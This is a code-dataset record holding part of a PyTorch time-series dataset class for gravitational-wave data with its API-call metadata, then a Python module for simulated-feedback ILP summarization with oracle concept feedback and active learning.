self.channels = self.channels[sorted_indices]
self.data = self.data[sorted_indices]
self.target_idx = np.where(self.channels == target_channel)[0][0]
def write(self, fname, group=None, write_mode='w'):
""" Write to HDF5 format. Can be read directly by gwpy.timeseries.TimeSeriesDict """
with h5py.File(fname, write_mode) as f:
# write to group if group is given
if group is not None:
fobj = f.create_group(group)
else:
fobj = f
for chan, ts in zip(self.channels, self.data):
dset = fobj.create_dataset(chan, data=ts, compression='gzip')
dset.attrs['sample_rate'] = self.fs
dset.attrs['t0'] = self.t0
dset.attrs['channel'] = str(chan)
dset.attrs['name'] = str(chan)
def bandpass(self, fl, fh, order=8, channels=None):
""" Bandpass filter data """
if isinstance(fl, (list, tuple)):
fl = fl[0]
if isinstance(fh, (list, tuple)):
fh = fh[-1]
# create a copy of the class
new = self.copy()
# bandpassing
if isinstance(channels, str):
if channels == 'all':
new.data = bandpass(new.data, self.fs, fl, fh, order)
elif channels == 'target':
new.data[new.target_idx] = bandpass(
new.data[new.target_idx], self.fs, fl, fh, order)
elif channels == 'aux':
for i, d in enumerate(new.data):
if i == new.target_idx:
continue
new.data[i] = bandpass(d, self.fs, fl, fh, order)
elif isinstance(channels, list):
for i, (chan, d) in enumerate(zip(new.channels, new.data)):
if chan not in channels:
continue
new.data[i] = bandpass(d, self.fs, fl, fh, order)
return new
def normalize(self, mean=None, std=None):
""" Normalize data by mean and std """
if mean is None:
mean = self.mean
if std is None:
std = self.std
new = self.copy()
new.data = (new.data - mean) / std
return new
def copy(self):
""" Return a copy of class """
return copy.deepcopy(self)
def get(self, channels):
""" Return data from given channels """
data = []
for chan, d in zip(self.channels, self.data):
if chan not in channels:
continue
data.append(d)
data = np.stack(data)
return data
def get_target(self):
""" Get target channel """
return self.data[self.target_idx]
@property
def mean(self):
""" Return mean of each channel """
return self.data.mean(axis=-1, keepdims=True)
@property
def std(self):
""" Return std of each channel """
return self.data.std(axis=-1, keepdims=True)
@property
def n_channels(self):
""" Return number of channels 2"""
return len(self.channels)
class TimeSeriesSegmentDataset(TimeSeriesDataset):
""" Torch timeseries dataset with segment """
def __init__(self, kernel, stride, pad_mode='median'):
super().__init__()
self.kernel = kernel
self.stride = stride
self.pad_mode = pad_mode
def __len__(self):
""" Return the number of stride """
nsamp = self.data.shape[-1]
kernel = int(self.kernel * self.fs)
stride = int(self.stride * self.fs)
n_stride = int(np.ceil((nsamp - kernel) / stride) + 1)
return max(0, n_stride)
def __getitem__(self, idx):
""" Get sample Tensor for a given index """
# check if idx is valid:
if idx < 0:
idx += self.__len__()
if idx >= self.__len__():
raise IndexError(
f'index {idx} is out of bound with size {self.__len__()}.')
# get sample
kernel = int(self.kernel * self.fs)
stride = int(self.stride * self.fs)
idx_start = idx * stride
idx_stop = idx_start + kernel
data = self.data[:, idx_start: idx_stop].copy()
# apply padding if needed
nsamp = data.shape[-1]
if nsamp < kernel:
pad = kernel - nsamp
data = np.pad(data, ((0, 0), (0, pad)), mode=self.pad_mode)
# separate into target HOFT and aux channel
target = data[self.target_idx]
aux = np.delete(data, self.target_idx, axis=0)
# convert into Tensor
target = torch.Tensor(target)
aux = torch.Tensor(aux)
return aux, target
| [
"numpy.stack",
"numpy.pad",
"copy.deepcopy",
"h5py.File",
"gwpy.timeseries.TimeSeriesDict.get",
"numpy.ceil",
"numpy.argsort",
"torch.Tensor",
"numpy.sin",
"numpy.where",
"numpy.delete",
"gwpy.timeseries.TimeSeries"
] | [((817, 894), 'gwpy.timeseries.TimeSeriesDict.get', 'TimeSeriesDict.get', (['channels', 't0', '(t0 + duration)'], {'nproc': 'nproc', 'allow_tape': '(True)'}), '(channels, t0, t0 + duration, nproc=nproc, allow_tape=True)\n', (835, 894), False, 'from gwpy.timeseries import TimeSeries, TimeSeriesDict\n'), ((1339, 1358), 'numpy.stack', 'np.stack', (['self.data'], {}), '(self.data)\n', (1347, 1358), True, 'import numpy as np\n'), ((1383, 1406), 'numpy.stack', 'np.stack', (['self.channels'], {}), '(self.channels)\n', (1391, 1406), True, 'import numpy as np\n'), ((3284, 3303), 'numpy.stack', 'np.stack', (['self.data'], {}), '(self.data)\n', (3292, 3303), True, 'import numpy as np\n'), ((3328, 3351), 'numpy.stack', 'np.stack', (['self.channels'], {}), '(self.channels)\n', (3336, 3351), True, 'import numpy as np\n'), ((3419, 3444), 'numpy.argsort', 'np.argsort', (['self.channels'], {}), '(self.channels)\n', (3429, 3444), True, 'import numpy as np\n'), ((5863, 5882), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (5876, 5882), False, 'import copy\n'), ((6153, 6167), 'numpy.stack', 'np.stack', (['data'], {}), '(data)\n', (6161, 6167), True, 'import numpy as np\n'), ((8181, 8221), 'numpy.delete', 'np.delete', (['data', 'self.target_idx'], {'axis': '(0)'}), '(data, self.target_idx, axis=0)\n', (8190, 8221), True, 'import numpy as np\n'), ((8282, 8302), 'torch.Tensor', 'torch.Tensor', (['target'], {}), '(target)\n', (8294, 8302), False, 'import torch\n'), ((8317, 8334), 'torch.Tensor', 'torch.Tensor', (['aux'], {}), '(aux)\n', (8329, 8334), False, 'import torch\n'), ((2268, 2297), 'numpy.sin', 'np.sin', (['(2 * np.pi * f0 * time)'], {}), '(2 * np.pi * f0 * time)\n', (2274, 2297), True, 'import numpy as np\n'), ((2314, 2400), 'gwpy.timeseries.TimeSeries', 'TimeSeries', (['sine_2pi_ft'], {'t0': 't0', 'sample_rate': 'fs', 'name': 'chan', 'unit': '"""ct"""', 'channel': 'chan'}), "(sine_2pi_ft, t0=t0, sample_rate=fs, name=chan, unit='ct',\n channel=chan)\n", (2324, 2400), False, 'from gwpy.timeseries import TimeSeries, TimeSeriesDict\n'), ((2820, 2841), 'h5py.File', 'h5py.File', (['fname', '"""r"""'], {}), "(fname, 'r')\n", (2829, 2841), False, 'import h5py\n'), ((3798, 3826), 'h5py.File', 'h5py.File', (['fname', 'write_mode'], {}), '(fname, write_mode)\n', (3807, 3826), False, 'import h5py\n'), ((8010, 8062), 'numpy.pad', 'np.pad', (['data', '((0, 0), (0, pad))'], {'mode': 'self.pad_mode'}), '(data, ((0, 0), (0, pad)), mode=self.pad_mode)\n', (8016, 8062), True, 'import numpy as np\n'), ((1475, 1516), 'numpy.where', 'np.where', (['(self.channels == target_channel)'], {}), '(self.channels == target_channel)\n', (1483, 1516), True, 'import numpy as np\n'), ((3571, 3612), 'numpy.where', 'np.where', (['(self.channels == target_channel)'], {}), '(self.channels == target_channel)\n', (3579, 3612), True, 'import numpy as np\n'), ((7219, 7253), 'numpy.ceil', 'np.ceil', (['((nsamp - kernel) / stride)'], {}), '((nsamp - kernel) / stride)\n', (7226, 7253), True, 'import numpy as np\n')] |
from __future__ import print_function
import json
import itertools
import re
import os.path as path
import sys
sys.path.append(path.dirname(path.dirname(path.dirname(path.abspath(__file__)))))
import tempfile
import random
import numpy as np
import pulp
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from sklearn import svm
from summarizer.algorithms.feedback_graph import SimpleNgramFeedbackGraph, PageRankFeedbackGraph
from summarizer.algorithms.flight_recorder import FlightRecorder, Record
from summarizer.baselines import sume
from summarizer.baselines.sume_wrap import SumeWrap
from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, \
prune_phrases
RECOMMENDER_METHOD_SAMPLING = "SAMPLING"
RECOMMENDER_METHOD_HIGHEST_WEIGHT = "HIGHEST_WEIGHT"
PARSE_TYPE_PARSE = 'parse'
ORACLE_TYPE_CUSTOM_WEIGHT = 'CUSTOM_WEIGHT'
ORACLE_TYPE_TOP_N = 'top_n'
ORACLE_TYPE_KEEPTRACK = 'keeptrack'
ORACLE_TYPE_ACTIVE_LEARNING = 'active_learning'
ORACLE_TYPE_ACTIVE_LEARNING2 = 'active_learning2'
ORACLE_TYPE_ILP_FEEDBACK = "ilp_feedback"
ORACLE_TYPE_ACCEPT_REJECT = 'accept_reject'
ORACLE_TYPE_ACCEPT = 'accept'
ORACLE_TYPE_REJECT = 'reject'
ORACLE_TYPE_ACCEPT_ALL = 'accept_all'
ORACLE_TYPE_REJECT_ALL = 'reject_all'
CHANGE_WEIGHT_MODE_ACCEPT = 'accept'
CHANGE_WEIGHT_MODE_REJECT = 'reject'
CHANGE_WEIGHT_MODE_IMPLICIT_REJECT = 'implicit_reject'
from summarizer.utils.writer import write_to_file
class Oracle():
def reject_concepts(self, summ_concepts, ref_concepts):
'''
Reject Ngrams
Keyword arguments:
ref_ngrams: list of reference n-gram tuples
['1 2', '2 3', '3 4']
summ_ngrams: list of summary n-gram tuples
['1 2', '2 4']
return:
Return N-grams not present in reference
['2 4']
'''
return set(summ_concepts) - ref_concepts
def accept_concepts(self, summ_concepts, ref_concepts):
'''
Accept Ngrams
Keyword arguments:
ref_ngrams: list of reference n-gram tuples
['1 2', '2 3', '3 4']
summ_ngrams: list of summary n-gram tuples
['1 2', '2 4']
return: Overlap of N-grams
['1 2']
'''
return set(summ_concepts) & ref_concepts
class SimulatedFeedback(object):
def __init__(self, language, rouge, embeddings={}, fvector=[], ngrams_size=2, top_n=100, dump_base_dir=tempfile.mkdtemp(prefix="simufee-")):
'''
Initialize the docs and models structure
'''
self.Oracle = Oracle() # oracle
self.SumeWrap = SumeWrap(language) # only used to load the sentences and push them into self.summarizer
self.summarizer = sume.ConceptBasedILPSummarizer(" ", language)
self.N = ngrams_size # how many words an should the ngrams consist of
self.top_n = top_n # currently unused
self.ref_ngrams = set() # set of ngrams that are in the reference summaries (for the feedback to peek)
self.ref_phrases = set() # set of phrases that are in the reference summaries (for the feedback to peek)
self.flight_recorder = FlightRecorder() # The flight-recorder stores all interactions wrt to concepts (eg. accepted, and rejected)
self.info_data = [] # stats for the pipeline. The only thing that leaves this class
self.initial_weights = {} # oracle reweighting
self.language = language # document language. relevant for stemmer, embeddings, stopwords, parsing
#self.stemmer = SnowballStemmer(self.language)
if self.language == "english":
self.stemmer = SnowballStemmer(self.language)
#elf.stemmer = WordNetLemmatizer()
else:
self.stemmer = SnowballStemmer(self.language)
self.stoplist = set(stopwords.words(self.language))
self.rouge = rouge
self.cluster_size = 0.0
self.embeddings = embeddings # word2vec embeddings
self.fvector = fvector # List of support vectors for active learning SVM
self.pos_hash = {} # active learning // SVM
self.concept_vec_idx = {} # active learning // SVM
self.index_vec_concept = {} # active learning // SVM
### previously uninitialized fields...
self.data = None # np.array(self.fvector) # active learning // SVM TODO rename self.data to somehting that contains svm...
self.labels = None # active learning // SVM
self.MAX_WEIGHT = None # int with # of documents (i.e. largest possible DF value)
self.models = None # reference summaries, only needed for rouge score (as they are converted merged into one large summary)
self.parse_type = None # None or "parse"
self.prev_score = None # rouge scores of previous iteration.
self.score = None # rouge scores of current iteration.
self.summary_length = None # target summary length.
self.ub_score = None # rouge scores of upper bound
self.uncertainity = {} # active learning // SVM
# graph based propagation settings
self.graph = PageRankFeedbackGraph(self.stemmer, self.language)
# self.graph = SimpleNgramFeedbackGraph(self.stemmer, self.language, N=5)
self.debug_dump_target_dir = dump_base_dir
self.allowed_number_of_feedback_per_iteration=5
def get_sorted_concepts(self):
'''
Get sorted concepts
'''
sorted_concepts = sorted(self.summarizer.weights,
key=lambda x: self.summarizer.weights[x],
reverse=True)
# iterates over the concept weights
return sorted_concepts
def get_implicit_feedback(self, summ_ngrams, list_concepts):
feedback_keys = []
for key in summ_ngrams:
for phrase in list_concepts:
if re.search(u'(\s|^)%s([\s]|$)' % (key), u'%s' % (phrase)) or re.search(u'(\s|^)%s([\s]|$)' % (phrase),
u'%s' % (key)):
# print(key, phrase)
feedback_keys.append(key)
implicit_feedback = set(summ_ngrams) - set(feedback_keys)
return implicit_feedback
def get_feedback(self, subset, recommender=None):
"""
Generate feedback for the subset sentences by peeking into the reference summary.
:param subset: The indices of the sentences to get feedback for.
:param allowed_number_of_feedbacks: how many concepts may be sent to the oracle, default all
"""
new_implicit_rejects = set() # currently not used (all writing occurences are commented out)
summary = [self.summarizer.sentences[j].untokenized_form for j in subset]
# print('Feedback-optimal summary:', summary)
if self.parse_type == 'parse':
print('feedback on phrases')
summary_phrases = [self.summarizer.sentences[j].phrases for j in subset]
samples = list(itertools.chain(*summary_phrases))
references=self.ref_phrases
elif self.parse_type == None:
print('feedback on ngrams')
summary_concepts = [self.summarizer.sentences[j].concepts for j in subset]
samples = list(itertools.chain(*summary_concepts))
references = self.ref_ngrams
# from all samples, use a sub-set
if recommender is None:
use_samples = samples
elif recommender == RECOMMENDER_METHOD_SAMPLING:
use_samples = random.sample(samples, self.allowed_number_of_feedback_per_iteration)
elif recommender == RECOMMENDER_METHOD_HIGHEST_WEIGHT:
use_samples = self.recommend_highest_weight(samples, self.allowed_number_of_feedback_per_iteration);
new_rejects = list(self.Oracle.reject_concepts(use_samples, references) - self.flight_recorder.union().reject)
new_accepts = list(self.Oracle.accept_concepts(use_samples, references) - self.flight_recorder.union().accept)
new_rejects = prune_ngrams(new_rejects, self.stoplist, self.N)
new_accepts = prune_ngrams(new_accepts, self.stoplist, self.N)
'''
if self.parse_type == 'parse':
self.recorder.total_accept_keys += self.project_phrase_ngrams(self.recorder.accepted_concepts)
self.recorder.total_reject_keys += self.project_phrase_ngrams(self.recorder.rejected_concepts)
x = list(Set(self.recorder.total_accept + self.recorder.union.reject))
new_implicit_rejects = list(self.get_implicit_feedback(summ_ngrams, x) - Set(self.recorder.total_implicit_reject))
# self.recorder.total_implicit_reject += self.recorder.latest().implicit_reject
'''
# self.recorder.total_accept += self.recorder.accepted_concepts
# self.recorder.total_reject += self.recorder.rejected_concepts
# self.recorder.total_implicit_reject += self.recorder.latest().implicit_reject
return (new_accepts, new_rejects, new_implicit_rejects)
def recommend_highest_weight(self, samples, limit=1, prune=True):
w = dict(self.graph.get_weights())
s = sorted(w, key=w.get, reverse=True)
s = [item for item in s if 0.0 < w.get(item) < 1.0
and item not in self.flight_recorder.union().reject
and item not in self.flight_recorder.union().accept
and item not in self.flight_recorder.union().implicit_reject]
pruned = prune_ngrams(s, self.stoplist, self.N)
result =[]
for concept in s:
if concept in samples:
# print ("adding %s with weight %s to result" % (concept, w[concept]))
result.append(concept)
return result[:limit]
def partial_feedback(self, ngrams_list):
return [ngram for ngram in ngrams_list if self.summarizer.weights[ngram] > 1]
def change_weights(self, concept_list, oracle_type):
for key in concept_list:
if oracle_type == CHANGE_WEIGHT_MODE_REJECT:
self.summarizer.weights[key] = 0.0
if oracle_type == CHANGE_WEIGHT_MODE_ACCEPT:
self.summarizer.weights[key] = self.MAX_WEIGHT
def recalculate_weights(self, oracle_type, propagation=False):
"""
Set new weights in self.summarizer.weights according to the currently selected feedbcack method.
This method basically interprets the feedback. if propagation is False, its using the default model, which
is changing weights based on the FlightRecorder feedback. If propagation is True, changing weights is based
on graph traversal...
:param oracle_type:
"""
# if the graph exists, we need to update it using EXACTLY the same data as the other oracles used.
if propagation is False:
self.__update_summarizer_weights_baseline__(oracle_type)
elif propagation is True:
self.graph.incorporate_feedback(self.flight_recorder)
self.__update_summarizer_weights_using_graph__(oracle_type);
# change weights using the feedbackgraph
else:
print("recalculate weights is broken!");
def __update_summarizer_weights_using_graph__(self, oracle_type=""):
"""
"""
if self.graph is None:
raise StandardError("Set to propagation, but no coocurrence_graph is given")
G = self.graph
weights = self.summarizer.weights
for (concept, weight) in G.get_weights():
if weights.has_key(concept):
weights[concept] = weight * self.MAX_WEIGHT
elif weight > 1:
print("ignoring unknown key: " , concept, " with weight ", weight)
def __update_summarizer_weights_baseline__(self, oracle_type):
"""
The original method to update weights: Rejected concepts get weight ZERO, Accepted concepts get weight ONE.
:param oracle_type:
:return:
"""
# self.summarizer.weights = __convert_graph_to_weights__()
if oracle_type == ORACLE_TYPE_REJECT_ALL:
self.change_weights(self.flight_recorder.union().reject, CHANGE_WEIGHT_MODE_REJECT)
if self.parse_type == PARSE_TYPE_PARSE:
self.change_weights(self.flight_recorder.union().implicit_reject, CHANGE_WEIGHT_MODE_REJECT)
if oracle_type == ORACLE_TYPE_ACCEPT_ALL:
self.change_weights(self.flight_recorder.union().accept, CHANGE_WEIGHT_MODE_ACCEPT)
if oracle_type == ORACLE_TYPE_ACCEPT_REJECT \
or oracle_type == ORACLE_TYPE_ILP_FEEDBACK \
or oracle_type.startswith(ORACLE_TYPE_ACTIVE_LEARNING):
if self.parse_type == None:
print('Weight change', oracle_type)
self.change_weights(self.flight_recorder.latest().reject, CHANGE_WEIGHT_MODE_REJECT)
self.change_weights(self.flight_recorder.latest().accept, CHANGE_WEIGHT_MODE_ACCEPT)
if self.parse_type == PARSE_TYPE_PARSE:
self.change_weights(self.project_phrase_ngrams(self.flight_recorder.latest().reject),
CHANGE_WEIGHT_MODE_REJECT)
self.change_weights(self.project_phrase_ngrams(self.flight_recorder.latest().accept),
CHANGE_WEIGHT_MODE_ACCEPT)
self.change_weights(self.flight_recorder.latest().implicit_reject, CHANGE_WEIGHT_MODE_REJECT)
if oracle_type == ORACLE_TYPE_KEEPTRACK:
if self.parse_type == None:
self.change_weights(self.flight_recorder.latest().reject, CHANGE_WEIGHT_MODE_REJECT)
if self.flight_recorder.latest().accept:
self.change_weights(self.flight_recorder.union().accept, CHANGE_WEIGHT_MODE_REJECT)
else:
self.change_weights(self.flight_recorder.union().accept, CHANGE_WEIGHT_MODE_ACCEPT)
if self.parse_type == PARSE_TYPE_PARSE:
self.change_weights(self.project_phrase_ngrams(self.flight_recorder.latest().reject),
CHANGE_WEIGHT_MODE_REJECT)
self.change_weights(self.flight_recorder.latest().implicit_reject, CHANGE_WEIGHT_MODE_REJECT)
if self.flight_recorder.latest().accept:
self.change_weights(self.project_phrase_ngrams(self.flight_recorder.latest().accept),
CHANGE_WEIGHT_MODE_ACCEPT)
else:
self.change_weights(self.project_phrase_ngrams(self.flight_recorder.union().accept),
CHANGE_WEIGHT_MODE_ACCEPT)
if oracle_type == ORACLE_TYPE_TOP_N:
self.summarizer.weights = self.initial_weights
self.change_weights(self.flight_recorder.union().reject, CHANGE_WEIGHT_MODE_REJECT)
self.change_weights(self.flight_recorder.union().accept, CHANGE_WEIGHT_MODE_ACCEPT)
if self.flight_recorder.union().accept:
sorted_weights = self.get_sorted_concepts()
for key in self.summarizer.weights:
if key not in sorted_weights[:400]:
self.summarizer.weights[key] = 0
def get_details(self, iteration, summary_length, oracle_type):
"""
Get details about an ilp iteration. It does actually recalc the weights, solve the ilp, extract the
relevant information, and resets the weights to the previous value.
:param iteration:
:param summary_length:
:param oracle_type:
:return:
"""
print("flight rec: (T: %s = A: %s + R: %s ), (L: %s = A: %s + R: %s)" %
(len(self.flight_recorder.union().accept | self.flight_recorder.union().reject),
len(self.flight_recorder.union().accept),
len(self.flight_recorder.union().reject),
len(self.flight_recorder.latest().accept | self.flight_recorder.latest().reject),
len(self.flight_recorder.latest().accept),
len(self.flight_recorder.latest().reject)))
# solve the ilp model
value, subset = self.summarizer.solve_ilp_problem(summary_size=int(summary_length), units="WORDS")
summary = [self.summarizer.sentences[j].untokenized_form for j in subset]
summary_text = '\n'.join(summary)
score = self.rouge(summary_text, self.models, self.summary_length)
accepted = self.flight_recorder.latest().accept
rejected = self.flight_recorder.latest().reject
row = [str(iteration), score[0], score[1], score[2], len(accepted), len(rejected),
summary_text]
#self.summarizer.weights = old_weights
print(row[:-1])
# print(summary_text.encode('utf-8'))
self.info_data.append(row)
return summary, score, subset
def check_break_condition(self, iteration, prev_summary, summary, ub_summary, prev_score):
if not self.flight_recorder.latest().accept and not self.flight_recorder.latest().reject:
print("BREAKING HERE: Stopping because last flight_recorder is basically empty")
return 1
if self.score[1] >= self.ub_score[1]: # ROUGE2 score> Upper-bound
print("BREAKING HERE: current summary is BETTER than UB")
return 1
if summary == ub_summary:
print("BREAKING HERE: Found UB summary")
return 1
if self.ub_score == self.score:
print("BREAKING HERE: score is equal to UB score")
return 1
return 0
def solve_joint_ilp(self, summary_size, feedback, non_feedback, uncertainity={}, labels={}, unique=False, solver='glpk', excluded_solutions=[]):
"""
:param summary_size: The size of the backpack. i.e. how many words are allowed in the summary.
:param feedback:
:param non_feedback:
:param unique: if True, an boudin_2015 eq. (5) is applied to enforce a unique solution.
:param solver: cplex, if fails use the mentioned solver
:param excluded_solutions:
:return: (val, set) tuple (int, list): the value of the objective function and the set of
selected sentences as a tuple.
"""
w = self.summarizer.weights
u = uncertainity
L = summary_size
NF = len(non_feedback)
F = len(feedback)
S = len(self.summarizer.sentences)
if not self.summarizer.word_frequencies:
self.summarizer.compute_word_frequency()
tokens = self.summarizer.word_frequencies.keys()
f = self.summarizer.word_frequencies
T = len(tokens)
# HACK Sort keys
# concepts = sorted(self.weights, key=self.weights.get, reverse=True)
# formulation of the ILP problem
prob = pulp.LpProblem(self.summarizer.input_directory, pulp.LpMaximize)
# initialize the concepts binary variables
nf = pulp.LpVariable.dicts(name='nf',
indexs=range(NF),
lowBound=0,
upBound=1,
cat='Integer')
f = pulp.LpVariable.dicts(name='F',
indexs=range(F),
lowBound=0,
upBound=1,
cat='Integer')
# initialize the sentences binary variables
s = pulp.LpVariable.dicts(name='s',
indexs=range(S),
lowBound=0,
upBound=1,
cat='Integer')
# initialize the word binary variables
t = pulp.LpVariable.dicts(name='t',
indexs=range(T),
lowBound=0,
upBound=1,
cat='Integer')
# OBJECTIVE FUNCTION
if labels:
print('solve for Active learning 2')
prob += pulp.lpSum(w[non_feedback[i]] * (1.0 - u[non_feedback[i]]) * labels[non_feedback[i]] * nf[i] for i in range(NF))
if not labels:
if uncertainity:
print('solve for Active learning')
if feedback:
# In this phase, we force new concepts to be chosen, and not those we already have feedback on, and
# therefore non_feedback is added while feedback is substracted from the problem. I.e. by
# substracting the feedback, those sentences will disappear from the solution.
prob += pulp.lpSum(w[non_feedback[i]] * u[non_feedback[i]] * nf[i] for i in range(NF)) - pulp.lpSum(
w[feedback[i]] * u[feedback[i]] * f[i] for i in range(F))
pulp.l
else:
prob += pulp.lpSum(w[non_feedback[i]] * u[non_feedback[i]] * nf[i] for i in range(NF))
if not uncertainity:
print('solve for ILP feedback')
if feedback:
prob += pulp.lpSum(w[non_feedback[i]] * nf[i] for i in range(NF)) - pulp.lpSum(w[feedback[i]] * f[i] for i in range(F))
else:
prob += pulp.lpSum(w[non_feedback[i]] * nf[i] for i in range(NF))
if unique:
prob += pulp.lpSum(w[non_feedback[i]] * nf[i] for i in range(NF)) - pulp.lpSum(w[feedback[i]] * f[i] for i in range(F)) + \
10e-6 * pulp.lpSum(f[tokens[k]] * t[k] for k in range(T))
# CONSTRAINT FOR SUMMARY SIZE
prob += pulp.lpSum(s[j] * self.summarizer.sentences[j].length for j in range(S)) <= L
# INTEGRITY CONSTRAINTS
for i in range(NF):
for j in range(S):
if non_feedback[i] in self.summarizer.sentences[j].concepts:
prob += s[j] <= nf[i]
for i in range(NF):
prob += pulp.lpSum(s[j] for j in range(S)
if non_feedback[i] in self.summarizer.sentences[j].concepts) >= nf[i]
for i in range(F):
for j in range(S):
if feedback[i] in self.summarizer.sentences[j].concepts:
prob += s[j] <= f[i]
for i in range(F):
prob += pulp.lpSum(s[j] for j in range(S)
if feedback[i] in self.summarizer.sentences[j].concepts) >= f[i]
# WORD INTEGRITY CONSTRAINTS
if unique:
for k in range(T):
for j in self.summarizer.w2s[tokens[k]]:
prob += s[j] <= t[k]
for k in range(T):
prob += pulp.lpSum(s[j] for j in self.summarizer.w2s[tokens[k]]) >= t[k]
# CONSTRAINTS FOR FINDING OPTIMAL SOLUTIONS
for sentence_set in excluded_solutions:
prob += pulp.lpSum([s[j] for j in sentence_set]) <= len(sentence_set) - 1
# prob.writeLP('test.lp')
# solving the ilp problem
try:
print('Solving using CPLEX')
prob.solve(pulp.CPLEX(msg=0))
except:
print('Fallback to mentioned solver')
if solver == 'gurobi':
prob.solve(pulp.GUROBI(msg=0))
elif solver == 'glpk':
prob.solve(pulp.GLPK(msg=0))
else:
sys.exit('no solver specified')
# retreive the optimal subset of sentences
solution = set([j for j in range(S) if s[j].varValue == 1])
# returns the (objective function value, solution) tuple
return (pulp.value(prob.objective), solution)
def get_feature_vector(self):
"""
assign each concept a vector in word2vec space that is the mean of its constituting words
:return:
"""
'''
corpus = [' '.join(doc) for _, doc in docs]
vectorizer = TfidfVectorizer(min_df=1)
X = vectorizer.fit_transform(corpus)
idf = vectorizer._tfidf.idf_
tf_idf = dict(zip(vectorizer.get_feature_names(), idf))
print tf_idf
'''
index = 0
self.uncertainity, self.concept_vec_idx = {}, {}
self.fvector = []
unknown_l, hit_l = [], []
for i in range(len(self.summarizer.sentences)):
'''
print(self.summarizer.sentences[i].concepts)
print(self.summarizer.sentences[i].untokenized_form)
print(self.summarizer.sentences[i].tokens_pos)
'''
# for each concept
for concept in self.summarizer.sentences[i].concepts:
#print(self.summarizer.sentences[i].untokenized_form)
pos_map = [0.0, 0.0, 0.0, 0.0, 0.0] #NN, VB, JJ, ADV, Others
if concept not in self.concept_vec_idx:
ngram = concept.split(' ')
is_capital, is_num, stopword, pos_list, concept_tf, embd = 0, 0, 0, [], [], []
for token in ngram:
try:
word, pos = self.summarizer.sentences[i].tokens_pos[token].split('::')
except:
token = re.sub(u'[-\.](\s|$)', u'\\1', token)
token = re.sub(u'([^.])[.]$', u'\\1', token)
try:
word, pos = self.summarizer.sentences[i].tokens_pos[token].split('::')
except:
if token.isnumeric():
word, pos = token, 'CD'
else:
word, pos = token, 'NN'
if word.istitle():
is_capital += 1
"""
if pos == 'CD':
is_num += 1
if re.match('N.*', pos):
pos_map[0] = 1.0
if re.match('V.*', pos):
pos_map[1] = 1.0
if re.match('JJ.*|', pos):
pos_map[1] = 1.0
"""
#print(token,)
if token in self.stoplist:
stopword += 1
if token in self.summarizer.word_frequencies:
concept_tf.append(self.summarizer.word_frequencies[token])
if token not in self.stoplist:
word_l = word.lower()
if word_l in self.embeddings.vocab_dict:
embd_val = self.embeddings.W[self.embeddings.vocab_dict[word_l]]
hit_l.append(word_l)
embd.append(embd_val.tolist())
else:
joint_words = word_l.split('-')
for j_word in joint_words:
j_word = unicode(j_word)
if j_word in self.embeddings.vocab_dict:
embd_val = self.embeddings.W[self.embeddings.vocab_dict[j_word]]
hit_l.append(j_word)
embd.append(embd_val.tolist())
else:
if self.language == "english":
embd_val = self.embeddings.W[self.embeddings.vocab_dict[u"unk"]]
if self.language == "german":
embd_val = self.embeddings.W[self.embeddings.vocab_dict[u"unknown"]]
unknown_l.append(unicode(word_l))
embd.append(embd_val.tolist())
pos_key = '_'.join(pos_list)
if pos_key in self.pos_hash:
pos_val = self.pos_hash[pos_key]
else:
pos_val = len(self.pos_hash) + 1
self.pos_hash[pos_key] = pos_val
if concept_tf == []:
concept_tf = [1]
# calculate concept vector as the mean of its constituent word vectors.
if concept not in self.concept_vec_idx:
if not embd:
print(embd, concept)
if self.language == "english":
embd_val = self.embeddings.W[self.embeddings.vocab_dict[u"unk"]]
if self.language == "german":
embd_val = self.embeddings.W[self.embeddings.vocab_dict[u"unknown"]]
embd.append(embd_val.tolist())
vector = np.mean(np.array(embd), axis=0)
vector = np.append(vector, np.array([-1]), axis=0)
self.fvector.append(vector.tolist())
"""
self.fvector.append([1.0 * self.summarizer.weights[concept]/self.cluster_size,
is_capital,
pos_val,
stopword,
np.mean(np.array(concept_tf)),
is_num])
"""
self.uncertainity[concept] = 1.0
self.concept_vec_idx[concept] = index
self.index_vec_concept[index] = concept
index += 1
hit_l, unknown_l = set(hit_l), set(unknown_l)
hit, unknown = len(hit_l), len(unknown_l)
print('size of the feature vector: %d' % len(self.fvector))
print('hit concepts: %d, unknown concepts: %d' % (hit, unknown))
print('hit ratio: %f, unknown ratio: %f' % (1.0 * hit/(hit+unknown), 1.0 * unknown/(hit+unknown)))
print('Unknown words', ','.join(unknown_l))
def change_labels(self, feedback_list, label):
for concept in feedback_list:
# print(concept, self.summarizer.weights[concept])
vec_index = self.concept_vec_idx[concept]
self.data[vec_index, -1] = label
def project_phrase_ngrams(self, concept_list):
feedback_keys = []
for phrase in concept_list:
for key in self.summarizer.weights:
if re.search(u'(\s|^)%s([\s]|$)' % (key), u'%s' % (phrase)) or re.search(u'(\s|^)%s([\s]|$)' % (phrase),
u'%s' % (key)):
# print(key, phrase)
feedback_keys.append(key)
return feedback_keys
def get_uncertainity_labels(self, model):
'''
if self.parse_type == PARSE_TYPE_PARSE:
#print('Accept keys:', self.recorder.total_accept_keys)
self.change_labels(self.recorder.total_accept_keys, label=1)
self.change_labels(self.recorder.union().reject_keys, label=0)
self.change_labels(self.recorder.union().implicit_reject, label=0)
if self.parse_type == None:
'''
self.change_labels(self.flight_recorder.union().accept, label=1)
self.change_labels(self.flight_recorder.union().reject, label=0)
Y = self.data[:, -1]
X = self.data[:, 1:-1]
UL_indexes = np.where(Y == -1)
L_indexes = np.where(Y > -1)
X_train, Y_train = X[L_indexes], Y[L_indexes]
X_unlabeled, _ = X[UL_indexes], Y[UL_indexes]
flag = 0
try:
model.fit(X_train, Y_train)
UL_probs = model.predict_proba(X_unlabeled)
UL = model.predict(X_unlabeled)
except: # If there are no Accepts [training data has only one class]
flag = 1
concept_u, concept_labels = {}, {}
index = 0
for vec_index in self.index_vec_concept:
concept = self.index_vec_concept[vec_index]
if vec_index not in UL_indexes[0]:
concept_u[concept] = 0.0
concept_labels[concept] = self.data[vec_index, -1]
else:
if flag == 0:
prob = UL_probs[index]
concept_u[concept] = 1 - prob.max()
concept_labels[concept] = UL[index]
else: # If there are no Accepts [training data has only one class]
concept_u[concept] = 1.0
concept_labels[concept] = 1.0
index += 1
return concept_u, concept_labels
def __call__(self, docs, models, summary_length, oracle_type, ub_score, ub_summary, parser_type=None, parse_info=[],
max_iteration_count=11, weights_override={}, clear_before_override=None, propagation=False):
"""
